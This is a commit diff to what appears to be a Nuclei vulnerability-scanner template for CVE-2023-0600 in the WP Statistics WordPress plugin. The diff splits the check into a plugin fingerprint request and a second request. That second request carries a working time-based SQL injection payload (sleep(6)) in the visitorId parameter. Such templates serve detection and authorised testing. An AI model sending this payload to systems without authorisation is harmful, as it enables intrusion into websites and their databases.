Update CVE-2023-0600.yaml

2023-12-21 18:29:00 +08:00 · 2023-12-21 18:29:00 +08:00 · e4b60292db
parent 115a9e02ca
commit e4b60292db
1 changed files with 12 additions and 10 deletions
--- a/http/cves/2023/CVE-2023-0600.yaml
+++ b/http/cves/2023/CVE-2023-0600.yaml
@ -30,28 +30,30 @@ info:
 variables:
  str: '{{rand_int(100000, 999999)}}'

+flow: http(1) && http(2)
+
 http:
  - raw:
      - |
        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - 'Real Time Traffic'
+
+  - raw:
      - |
        @timeout: 30s
        GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
        Host: {{Hostname}}

-    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
-          - 'status_code_1 == 200'
-          - 'contains(body_1, "Real Time Traffic")'
-        condition: and
-
-      - type: dsl
-        dsl:
-          - 'duration_2>=6'
-          - 'status_code_2 == 200'
-          - 'contains(body_2, "sleep(6)")'
+          - 'duration>=6'
+          - 'status_code == 200'
+          - 'contains(body, "sleep(6)")'
        condition: and
 # digest: 490a0046304402205f4a67bdaa27bcbfb4944dc0d8288b3d50b545f455fbe931a80fafc6e2fa444b0220682f0b80192b17ab02b96ab6f5f98fd2e943dbf3eefe26f861c61acdfd4c0858:922c64590222798bb761d5b6d8e72950